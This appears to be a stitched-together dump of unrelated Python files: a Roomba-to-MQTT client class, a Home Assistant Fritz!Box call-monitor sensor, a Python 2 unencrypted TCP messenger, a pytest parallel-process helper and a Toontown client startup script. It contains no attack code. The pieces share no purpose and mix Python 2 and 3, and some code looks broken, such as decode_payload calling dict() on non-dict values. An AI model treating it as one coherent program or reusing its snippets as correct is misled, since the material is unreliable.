#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Python 3.* (thanks to pschmitt for adding Python 3 compatibility).
Program to connect to Roomba 980 vacuum cleaner, decode JSON, and forward to MQTT
server.
Nick Waterton 24th April 2017: V 1.0: Initial Release
Nick Waterton 4th July 2017 V 1.1.1: Fixed MQTT protocol version, and map
paths, fixed paho-mqtt tls changes
Nick Waterton 5th July 2017 V 1.1.2: Minor fixes, CV version 3 .2 support
Nick Waterton 7th July 2017 V1.2.0: Added -o option "roomOutline" allows
enabling/disabling of room outline drawing, added auto creation of css/html
files Nick Waterton 11th July 2017 V1.2.1: Quick (untested) fix for room
outlines if you don't have OpenCV
"""
import json
import logging
import threading
import time
from collections import OrderedDict
from collections.abc import Mapping
from datetime import datetime
from roombapy.const import ROOMBA_ERROR_MESSAGES, ROOMBA_STATES
MAX_CONNECTION_RETRIES = 3
class RoombaConnectionError(Exception):
"""Roomba connection exception."""
pass
class Roomba:
"""
This is a Class for Roomba 900 series WiFi connected Vacuum cleaners.
Requires firmware version 2.0 and above (not V1.0). Tested with Roomba 980.
The username (blid) and password are required, and can be found using the
password() class above (or can be auto discovered).
Most of the underlying info was obtained from here:
https://github.com/koalazak/dorita980 many thanks!
The values received from the Roomba are stored in a dictionary called
master_state and can be accessed at any time; the contents are live and
will build up over time after connection.
This is not needed if the forward to mqtt option is used, as the events will
be decoded and published on the designated mqtt client topic.
"""
def __init__(self, remote_client, continuous=True, delay=1):
"""Roomba client initialization."""
self.log = logging.getLogger(__name__)
self.remote_client = remote_client
self._init_remote_client_callbacks()
self.continuous = continuous
if self.continuous:
self.log.debug("CONTINUOUS connection")
else:
self.log.debug("PERIODIC connection")
self.stop_connection = False
self.periodic_connection_running = False
self.topic = "#"
self.exclude = ""
self.delay = delay
self.periodic_connection_duration = 10
self.roomba_connected = False
self.indent = 0
self.master_indent = 0
self.co_ords = {"x": 0, "y": 0, "theta": 180}
self.cleanMissionStatus_phase = ""
self.previous_cleanMissionStatus_phase = ""
self.current_state = None
self.bin_full = False
self.master_state = {} # all info from roomba stored here
self.time = time.time()
self.update_seconds = 300 # update with all values every 5 minutes
self._thread = threading.Thread(target=self.periodic_connection)
self.on_message_callbacks = []
self.on_disconnect_callbacks = []
self.error_code = None
self.error_message = None
self.client_error = None
def register_on_message_callback(self, callback):
self.on_message_callbacks.append(callback)
def register_on_disconnect_callback(self, callback):
self.on_disconnect_callbacks.append(callback)
def _init_remote_client_callbacks(self):
self.remote_client.set_on_message(self.on_message)
self.remote_client.set_on_connect(self.on_connect)
self.remote_client.set_on_disconnect(self.on_disconnect)
def connect(self):
if self.roomba_connected or self.periodic_connection_running:
return
if self.continuous:
self._connect()
else:
self._thread.daemon = True
self._thread.start()
self.time = time.time() # save connection time
def _connect(self):
is_connected = self.remote_client.connect()
if not is_connected:
raise RoombaConnectionError(
"Unable to connect to Roomba at {}".format(
self.remote_client.address
)
)
return is_connected
def disconnect(self):
if self.continuous:
self.remote_client.disconnect()
else:
self.stop_connection = True
def periodic_connection(self):
# only one connection thread at a time!
if self.periodic_connection_running:
return
self.periodic_connection_running = True
while not self.stop_connection:
try:
self._connect()
except RoombaConnectionError as error:
self.periodic_connection_running = False
self.on_disconnect(error)
return
time.sleep(self.delay)
self.remote_client.disconnect()
self.periodic_connection_running = False
def on_connect(self, error):
self.log.info("Connecting to Roomba %s", self.remote_client.address)
self.client_error = error
if error is not None:
self.log.error(
"Roomba %s connection error, code %s",
self.remote_client.address,
error,
)
return
self.roomba_connected = True
self.remote_client.subscribe(self.topic)
def on_disconnect(self, error):
self.roomba_connected = False
self.client_error = error
if error is not None:
self.log.warning(
"Unexpectedly disconnected from Roomba %s, code %s",
self.remote_client.address,
error,
)
# call the callback functions
for callback in self.on_disconnect_callbacks:
callback(error)
return
self.log.info("Disconnected from Roomba %s", self.remote_client.address)
def on_message(self, mosq, obj, msg):
if self.exclude != "":
if self.exclude in msg.topic:
return
if self.indent == 0:
self.master_indent = max(self.master_indent, len(msg.topic))
log_string, json_data = self.decode_payload(msg.topic, msg.payload)
self.dict_merge(self.master_state, json_data)
self.log.debug(
"Received Roomba Data %s: %s, %s",
self.remote_client.address,
str(msg.topic),
str(msg.payload),
)
self.decode_topics(json_data)
# default every 5 minutes
if time.time() - self.time > self.update_seconds:
self.log.debug(
"Publishing master_state %s", self.remote_client.address
)
self.decode_topics(self.master_state) # publish all values
self.time = time.time()
# call the callback functions
for callback in self.on_message_callbacks:
callback(json_data)
def send_command(self, command, params=None):
if params is None:
params = {}
self.log.debug("Send command: %s", command)
roomba_command = {
"command": command,
"time": int(datetime.timestamp(datetime.now())),
"initiator": "localApp",
}
roomba_command.update(params)
str_command = json.dumps(roomba_command)
self.log.debug("Publishing Roomba Command : %s", str_command)
self.remote_client.publish("cmd", str_command)
def set_preference(self, preference, setting):
self.log.debug("Set preference: %s, %s", preference, setting)
val = setting
# Parse boolean string
if isinstance(setting, str):
if setting.lower() == "true":
val = True
elif setting.lower() == "false":
val = False
tmp = {preference: val}
roomba_command = {"state": tmp}
str_command = json.dumps(roomba_command)
self.log.debug("Publishing Roomba Setting : %s" % str_command)
self.remote_client.publish("delta", str_command)
def dict_merge(self, dct, merge_dct):
"""
Recursive dict merge.
Inspired by :meth:``dict.update()``, instead
of updating only top-level keys, dict_merge recurses down into dicts
nested to an arbitrary depth, updating keys. The ``merge_dct`` is
merged into ``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k, v in merge_dct.items():
if (
k in dct
and isinstance(dct[k], dict)
and isinstance(merge_dct[k], Mapping)
):
self.dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
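# Illustrative example of the merge semantics described in the docstring above:
# >>> dst = {"state": {"reported": {"batPct": 90}}}
# >>> src = {"state": {"reported": {"bin": {"full": False}}}}
# >>> self.dict_merge(dst, src)
# >>> dst
# {'state': {'reported': {'batPct': 90, 'bin': {'full': False}}}}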
def decode_payload(self, topic, payload):
"""
Format json for pretty printing.
Returns a string suitable for logging, and a dict of the JSON data
"""
indent = self.master_indent + 31 # number of spaces to indent json data
json_data = None
try:
# if it's json data, decode it (use OrderedDict to preserve keys
# order), else return as is...
json_data = json.loads(
payload.decode("utf-8")
.replace(":nan", ":NaN")
.replace(":inf", ":Infinity")
.replace(":-inf", ":-Infinity"),
object_pairs_hook=OrderedDict,
)
# if it's not a dictionary, probably just a number
if not isinstance(json_data, dict):
return json_data, dict(json_data)
json_data_string = "\n".join(
(indent * " ") + i
for i in (json.dumps(json_data, indent=2)).splitlines()
)
formatted_data = "Decoded JSON: \n%s" % json_data_string
except ValueError:
formatted_data = payload
return formatted_data, dict(json_data)
def decode_topics(self, state, prefix=None):
"""
Decode json data dict and publish as individual topics.
Publish to brokerFeedback/topic. The keys are concatenated with "_"
to make one unique topic name; string values are explicitly converted
to str to avoid unicode representations.
"""
for key, value in state.items():
if isinstance(value, dict):
if prefix is None:
self.decode_topics(value, key)
else:
self.decode_topics(value, prefix + "_" + key)
else:
if isinstance(value, list):
newlist = []
for i in value:
if isinstance(i, dict):
for ki, vi in i.items():
newlist.append((str(ki), vi))
else:
if isinstance(i, str):
i = str(i)
newlist.append(i)
value = newlist
if prefix is not None:
key = prefix + "_" + key
# all data starts with this, so it's redundant
key = key.replace("state_reported_", "")
# save variables for drawing map
if key == "pose_theta":
self.co_ords["theta"] = value
if key == "pose_point_x": # x and y are reversed...
self.co_ords["y"] = value
if key == "pose_point_y":
self.co_ords["x"] = value
if key == "bin_full":
self.bin_full = value
if key == "cleanMissionStatus_error":
try:
self.error_code = value
self.error_message = ROOMBA_ERROR_MESSAGES[value]
except KeyError as e:
self.log.warning(
"Error looking up Roomba error message: %s", e
)
self.error_message = "Unknown Error number: %s" % value
if key == "cleanMissionStatus_phase":
self.previous_cleanMissionStatus_phase = (
self.cleanMissionStatus_phase
)
self.cleanMissionStatus_phase = value
if prefix is None:
self.update_state_machine()
def update_state_machine(self, new_state=None):
"""
Roomba progresses through states (phases).
Normal Sequence is "" -> charge -> run -> hmPostMsn -> charge
Mid mission recharge is "" -> charge -> run -> hmMidMsn -> charge
-> run -> hmPostMsn -> charge
Stuck is "" -> charge -> run -> hmPostMsn -> stuck
-> run/charge/stop/hmUsrDock -> charge
Start program during run is "" -> run -> hmPostMsn -> charge
Need to identify a new mission to initialize the map, and the end of a
mission to finalize the map.
Assume charge -> run = start of mission (init map)
stuck -> charge = init map
Assume hmPostMsn -> charge = end of mission (finalize map)
Anything else = continue with existing map
"""
current_mission = self.current_state
try:
if (
self.master_state["state"]["reported"]["cleanMissionStatus"][
"mssnM"
]
== "none"
and self.cleanMissionStatus_phase == "charge"
and (
self.current_state == ROOMBA_STATES["pause"]
or self.current_state == ROOMBA_STATES["recharge"]
)
):
self.current_state = ROOMBA_STATES["cancelled"]
except KeyError:
pass
if (
self.current_state == ROOMBA_STATES["charge"]
and self.cleanMissionStatus_phase == "run"
):
self.current_state = ROOMBA_STATES["new"]
elif (
self.current_state == ROOMBA_STATES["run"]
and self.cleanMissionStatus_phase == "hmMidMsn"
):
self.current_state = ROOMBA_STATES["dock"]
elif (
self.current_state == ROOMBA_STATES["dock"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["recharge"]
elif (
self.current_state == ROOMBA_STATES["recharge"]
and self.cleanMissionStatus_phase == "charge"
and self.bin_full
):
self.current_state = ROOMBA_STATES["pause"]
elif (
self.current_state == ROOMBA_STATES["run"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["recharge"]
elif (
self.current_state == ROOMBA_STATES["recharge"]
and self.cleanMissionStatus_phase == "run"
):
self.current_state = ROOMBA_STATES["pause"]
elif (
self.current_state == ROOMBA_STATES["pause"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["pause"]
# so that we will draw map and can update recharge time
current_mission = None
elif (
self.current_state == ROOMBA_STATES["charge"]
and self.cleanMissionStatus_phase == "charge"
):
# so that we will draw map and can update charge status
current_mission = None
elif (
self.current_state == ROOMBA_STATES["stop"]
or self.current_state == ROOMBA_STATES["pause"]
) and self.cleanMissionStatus_phase == "hmUsrDock":
self.current_state = ROOMBA_STATES["cancelled"]
elif (
self.current_state == ROOMBA_STATES["hmUsrDock"]
or self.current_state == ROOMBA_STATES["cancelled"]
) and self.cleanMissionStatus_phase == "charge":
self.current_state = ROOMBA_STATES["dockend"]
elif (
self.current_state == ROOMBA_STATES["hmPostMsn"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["dockend"]
elif (
self.current_state == ROOMBA_STATES["dockend"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["charge"]
else:
if self.cleanMissionStatus_phase not in ROOMBA_STATES:
self.log.error(
"Can't find state %s in predefined Roomba states, "
"please create a new issue: "
"https://github.com/pschmitt/roombapy/issues/new",
self.cleanMissionStatus_phase,
)
self.current_state = None
else:
self.current_state = ROOMBA_STATES[
self.cleanMissionStatus_phase
]
if new_state is not None:
self.current_state = ROOMBA_STATES[new_state]
self.log.debug("Current state: %s", self.current_state)
if self.current_state != current_mission:
self.log.debug("State updated to: %s", self.current_state)
|
fritzbox_callmonitor.py
|
"""
A sensor to monitor incoming and outgoing phone calls on a Fritz!Box router.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fritzbox_callmonitor/
"""
import logging
import socket
import threading
import datetime
import time
import re
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_HOST, CONF_PORT, CONF_NAME,
CONF_PASSWORD, CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.util import Throttle
REQUIREMENTS = ['fritzconnection==0.6.5']
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = 'phonebook'
CONF_PREFIXES = 'prefixes'
DEFAULT_HOST = '169.254.1.1' # IP valid for all Fritz!Box routers
DEFAULT_NAME = 'Phone'
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = 'dialing'
VALUE_CONNECT = 'talking'
VALUE_DEFAULT = 'idle'
VALUE_DISCONNECT = 'idle'
VALUE_RING = 'ringing'
# Return cached results if phonebook was downloaded less than this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default='admin'): cv.string,
vol.Optional(CONF_USERNAME, default=''): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]):
vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get(CONF_PHONEBOOK)
prefixes = config.get(CONF_PREFIXES)
try:
phonebook = FritzBoxPhonebook(
host=host, port=port, username=username, password=password,
phonebook_id=phonebook_id, prefixes=prefixes)
except: # noqa: E722 pylint: disable=bare-except
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box",
phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_devices([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP,
_stop_listener
)
return monitor.sock is not None
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self.phonebook is not None
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return 'unknown'
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error("Cannot connect to %s on port %s: %s",
self.host, self.port, err)
def _listen(self):
"""Listen to incoming or outgoing calls."""
while not self.stopped.is_set():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
return
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
att = {"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": line[3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
class FritzBoxPhonebook:
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password,
phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# pylint: disable=import-error
import fritzconnection as fc
# Establish a connection to the FRITZ!Box.
self.fph = fc.FritzPhonebook(
address=self.host, user=self.username, password=self.password)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {re.sub(r'[^\d\+]', '', nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r'[^\d\+]', '', str(number))
if self.number_dict is None:
return 'unknown'
try:
return self.number_dict[number]
except KeyError:
pass
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip('0')]
except KeyError:
pass
return 'unknown'
|
main.py
|
from modules.Alfa.alfa import Alfa
import threading
import sys
alfa = Alfa()
if __name__ == "__main__":
try:
thread = threading.Thread(target=alfa.reciveData)
thread.daemon = True
thread.start()
alfa.sendData()
except KeyboardInterrupt:
sys.exit(0)
|
netcom.py
|
#!/usr/bin/python
import SocketServer, socket
import threading, Queue
import hashlib, netaddr
import argparse
class Communicator:
"""The communication module of the server, handling receipt and transmission of data over the network with a SocketServer and verifying messages with an md5 hash."""
# NOTE/TODO: This data is sent UNENCRYPTED over the network. To secure the communication channel, use TLS/SSL (e.g. the ssl module or, probably, OpenSSL)
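# Example usage (illustrative sketch; Python 2 syntax to match this module):
# >>> receiver = Communicator(port=49450)
# >>> receiver.listen()                          # serve in a background thread
# >>> sender = Communicator(port=49450, dest='localhost')
# >>> sender.talk('hello', printSuccess=True)    # True if the md5 echo matches
# >>> receiver.stop_listening()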
def __init__(self, port=49450, dest='localhost'):
self.port = port
self.dest = dest
self.rxMsgs = Queue.Queue() # messages that have been received by the server
self.txMsgs = Queue.Queue() # messages that have been transmitted by the server
self.authorizedHostNets = ['127.0.0.1/32', # hosts that are authorized to communicate with this server (CIDR or glob notation)
'192.168.1.0/24',
'10.179.1.0/24']
self.get_authorized_hosts_list()
self.isListening = False
#self.recipients = [] # list of previous message recipients (as (host, port) tuples)
def __del__(self):
if self.isListening:
self.stop_listening()
def add_authorized_host(self,netstr):
self.authorizedHostNets.append(netstr)
self.get_authorized_hosts_list()
def remove_authorized_host(self,netstr):
while netstr in self.authorizedHostNets:
self.authorizedHostNets.remove(netstr)
self.get_authorized_hosts_list()
def get_authorized_hosts_list(self):
self.authorizedHosts = []
for ahn in self.authorizedHostNets:
netstr = netaddr.glob_to_cidrs(ahn)[0] if '*' in ahn else ahn
self.authorizedHosts.append(netaddr.IPNetwork(netstr))
def listen(self):
"""Starts a listener thread that reads and processes messages."""
SocketServer.TCPServer.allow_reuse_address = True
self.server = self.NetComTCPServer(('',self.port), self.TCPHandler)
self.server.authorizedHosts = self.authorizedHosts
self.server.rxMsgs = self.rxMsgs
self.serverThread = threading.Thread(target=self.server.serve_forever)
self.serverThread.start()
self.isListening = True
print "Listening on port {}...".format(self.port)
def stop_listening(self):
self.server.shutdown()
self.server.server_close()
self.isListening = False
def print_messages_received(self):
print "Messages received on port {}".format(self.port)
print "=========================================="
while True:
try:
data = self.rxMsgs.get_nowait()
print data
except Queue.Empty:
# no data available, don't do anything
pass
def talk(self, msg, dest='', port=-1, printSuccess=False):
"""Send a message to another Communicator and verify transmission."""
port = self.port if port == -1 else port # use the same port unless the other host needs us to use a different one (why? do we need to do this?)
dest = self.dest if dest == '' else dest
self.lastRecipient = (dest, port)
self.success = False
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(self.lastRecipient)
self.sock.sendall(msg)
self.response = self.sock.recv(1024)
#print "Message hash: {}".format(hashlib.md5(msg).hexdigest())
#print "Response hash: {}".format(self.response)
if self.response == hashlib.md5(msg).hexdigest():
self.success = True
except socket.error as sockErr:
if sockErr.errno == 104:
print "Error! Message refused by host {}! Make sure you are authorized!".format(dest)
finally:
self.sock.close()
if self.success and printSuccess:
print "Message successfully delivered!"
elif printSuccess:
print "Uh-oh...I couldn\'t deliver the message!"
return self.success
class NetComTCPServer(SocketServer.TCPServer):
"""Server class for the SocketServer (to add some verification, etc.).
"""
def verify_request(self,request,client_address):
for ahn in self.authorizedHosts:
if client_address[0] in ahn:
return True
print "Message received from unauthorized host {}!".format(client_address)
return False
class TCPHandler(SocketServer.BaseRequestHandler):
"""RequestHandler class for the SocketServer.
"""
def handle(self):
# reads data from the client and puts it in the Queue rxMsgs to be processed by the program
self.data = self.request.recv(1024) # read data from client
self.server.rxMsgs.put(self.data) # put the data in the queue for other methods to read it
self.request.sendall(hashlib.md5(self.data).hexdigest()) # send back the md5 hash for verification
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='netcom.py', usage='%(prog)s [options] [message]', description='Program/module for insecure TCP communication over a network. (TLS Coming soon...).', epilog = 'When run as a script with no arguments, starts a server on the default port and listens for messages, printing them to the screen. When run with positional arguments, reads them as words of a message to send to msgDest.')
parser.add_argument('-p', '--port', dest = 'port', type = int, default = 49450, help = 'TCP port to use, (default %(default)s).')
parser.add_argument('-d', '--dest', '--destination', dest = 'msgDest', default = 'localhost', help = 'The hostname/IP of the message destination (default %(default)s).')
parser.add_argument('message', nargs=argparse.REMAINDER, help = 'The message to send to msgDest.')
args = parser.parse_args()
if len(args.message) > 0:
msg = " ".join(args.message)
com = Communicator(args.port)
com.talk(msg,dest=args.msgDest)
else:
# if in server mode, start the server and listen, stopping if they press Ctrl+C
print "Starting server..."
com = Communicator(args.port)
try:
com.listen()
com.print_messages_received()
except KeyboardInterrupt:
print "Stopping server..."
com.stop_listening()
|
parallel.py
|
import datetime
import logging
import os
import shutil
import tempfile
import signal
from multiprocessing import Process, Manager
from tests.common.helpers.assertions import pytest_assert as pt_assert
logger = logging.getLogger(__name__)
def parallel_run(target, args, kwargs, nodes, timeout=None):
"""Run target function on nodes in parallel
Args:
target (function): The target function to be executed in parallel.
args (list of tuple): List of arguments for the target function.
kwargs (dict): Keyword arguments for the target function. It will be extended with two keys: 'node' and
'results'. The 'node' key will hold an item of the nodes list. The 'results' key will hold an instance of
multiprocessing.Manager().dict(). It is a proxy of the shared dict that will be used by each process for
returning execution results.
nodes (list of nodes): List of nodes to be used by the target function
timeout (int or float, optional): Total time allowed for the spawned multiple processes to run. Defaults to
None. When timeout is specified, this function will wait at most 'timeout' seconds for the processes to
run. When time is up, this function will try to terminate or even kill all the processes.
Raises:
If any of the spawned processes cannot be terminated, the test is failed via pytest_assert.
Returns:
dict: An instance of multiprocessing.Manager().dict(). It is a proxy to the shared dict that is used by all the
spawned processes.
"""
workers = []
results = Manager().dict()
start_time = datetime.datetime.now()
for node in nodes:
kwargs['node'] = node
kwargs['results'] = results
process_name = "{}--{}".format(target.__name__, node)
worker = Process(name=process_name, target=target, args=args, kwargs=kwargs)
worker.start()
logger.debug('Started process {} running target "{}"'.format(worker.pid, process_name))
workers.append(worker)
for worker in workers:
logger.debug('Wait for process "{}" with pid "{}" to complete, timeout={}'.format(worker.name, worker.pid, timeout))
worker.join(timeout)
logger.debug('Process "{}" with pid "{}" completed'.format(worker.name, worker.pid))
# If execution time of processes exceeds timeout, need to force terminate them all.
if timeout is not None:
if (datetime.datetime.now() - start_time).seconds > timeout:
logger.error('Process execution time exceeds {} seconds.'.format(str(timeout)))
break
# check if we have any processes that failed - have exitcode non-zero
failed_processes = [worker for worker in workers if worker.exitcode != 0]
# Force terminate spawned processes
for worker in workers:
if worker.is_alive():
logger.error('Process {} with pid {} is still alive, try to force terminate it.'.format(worker.name, worker.pid))
worker.terminate()
end_time = datetime.datetime.now()
delta_time = end_time - start_time
# Some processes cannot be terminated. Try to kill them and raise flag.
running_processes = [worker for worker in workers if worker.is_alive()]
if len(running_processes) > 0:
logger.error('Found processes still running: {}. Try to kill them.'.format(str(running_processes)))
for p in running_processes:
try:
os.kill(p.pid, signal.SIGKILL)
except OSError:
pass
pt_assert(False, \
'Processes running target "{}" could not be terminated; tried killing them, but please check'.format(target.__name__))
# if we have failed processes, we should throw an exception and fail
if len(failed_processes):
logger.error('Processes "{}" had failures. Please check the debug logs'.format(failed_processes))
pt_assert(False, 'Processes "{}" had failures. Please check the debug logs'.format(failed_processes))
logger.info('Completed running processes for target "{}" in {} seconds'.format(target.__name__, str(delta_time)))
return results
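# Example usage (illustrative sketch; `check_bgp`, `do_check` and `duthosts` are
# hypothetical names standing in for a real target function, helper and node list):
#
# def check_bgp(extra_arg, node=None, results=None):
#     # 'node' and 'results' are injected by parallel_run()
#     results[str(node)] = do_check(node, extra_arg)
#
# results = parallel_run(check_bgp, ("arg1",), {}, duthosts, timeout=120)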
def reset_ansible_local_tmp(target):
"""Decorator for resetting ansible default local tmp dir for parallel multiprocessing.Process
Args:
target (function): The function to be decorated.
"""
def wrapper(*args, **kwargs):
# Reset the ansible default local tmp directory for the current subprocess
# Otherwise, multiple processes could share the same ansible default tmp directory and there could be conflicts
from ansible import constants
prefix = 'ansible-local-{}'.format(os.getpid())
constants.DEFAULT_LOCAL_TMP = tempfile.mkdtemp(prefix=prefix)
try:
target(*args, **kwargs)
finally:
# Users of tempfile.mkdtemp need to take care of cleaning up.
shutil.rmtree(constants.DEFAULT_LOCAL_TMP)
wrapper.__name__ = target.__name__
return wrapper
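# Example usage (illustrative sketch): decorate the target handed to parallel_run so
# each spawned process gets its own ansible local tmp directory:
#
# @reset_ansible_local_tmp
# def target(node=None, results=None):
#     results[str(node)] = node.shell("uptime")  # hypothetical node API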
|
ClientStart.py
|
#!/usr/bin/env python2
import __builtin__
__builtin__.process = 'client'
# Temporary hack patch:
__builtin__.__dict__.update(__import__('pandac.PandaModules', fromlist=['*']).__dict__)
from direct.extensions_native import HTTPChannel_extensions
from direct.extensions_native import Mat3_extensions
from direct.extensions_native import VBase3_extensions
from direct.extensions_native import VBase4_extensions
from direct.extensions_native import NodePath_extensions
from panda3d.core import loadPrcFile
if __debug__:
loadPrcFile('config/general.prc')
loadPrcFile('config/release/dev.prc')
from direct.directnotify.DirectNotifyGlobal import directNotify
from otp.settings.Settings import Settings
notify = directNotify.newCategory('ClientStart')
notify.setInfo(True)
preferencesFilename = ConfigVariableString(
'preferences-filename', 'preferences.json').getValue()
notify.info('Reading %s...' % preferencesFilename)
__builtin__.settings = Settings(preferencesFilename)
if 'fullscreen' not in settings:
settings['fullscreen'] = False
if 'music' not in settings:
settings['music'] = True
if 'sfx' not in settings:
settings['sfx'] = True
if 'musicVol' not in settings:
settings['musicVol'] = 1.0
if 'sfxVol' not in settings:
settings['sfxVol'] = 1.0
if 'loadDisplay' not in settings:
settings['loadDisplay'] = 'pandagl'
if 'toonChatSounds' not in settings:
settings['toonChatSounds'] = True
if 'newGui' not in settings:
settings['newGui'] = False
if 'show-disclaimer' not in settings:
settings['show-disclaimer'] = True
if 'fieldofview' not in settings:
settings['fieldofview'] = 52
if 'show-cog-levels' not in settings:
settings['show-cog-levels'] = True
if 'health-meter-mode' not in settings:
settings['health-meter-mode'] = 2
if 'experienceBarMode' not in settings:
settings['experienceBarMode'] = True
settings['newGui'] = False # Force this to be false
loadPrcFileData('Settings: res', 'win-size %d %d' % tuple(settings.get('res', (1280, 720))))
loadPrcFileData('Settings: fullscreen', 'fullscreen %s' % settings['fullscreen'])
loadPrcFileData('Settings: music', 'audio-music-active %s' % settings['music'])
loadPrcFileData('Settings: sfx', 'audio-sfx-active %s' % settings['sfx'])
loadPrcFileData('Settings: musicVol', 'audio-master-music-volume %s' % settings['musicVol'])
loadPrcFileData('Settings: sfxVol', 'audio-master-sfx-volume %s' % settings['sfxVol'])
loadPrcFileData('Settings: loadDisplay', 'load-display %s' % settings['loadDisplay'])
loadPrcFileData('Settings: toonChatSounds', 'toon-chat-sounds %s' % settings['toonChatSounds'])
'''loadDisplay = settings.get('loadDisplay', 'pandagl')
loadPrcFileData('', 'load-display' % settings['loadDisplay'])'''
import os
import time
import sys
import random
import __builtin__
try:
from toontown.launcher.TTALauncher import TTALauncher
launcher = TTALauncher()
__builtin__.launcher = launcher
except Exception as e:
raise (e)
notify.info('Starting the game...')
if launcher.isDummy():
http = HTTPClient()
else:
http = launcher.http
from toontown.toonbase import ToontownGlobals
tempLoader = Loader()
backgroundNode = tempLoader.loadSync(Filename('phase_3/models/gui/loading-background'))
from direct.gui import DirectGuiGlobals
from direct.gui.DirectGui import *
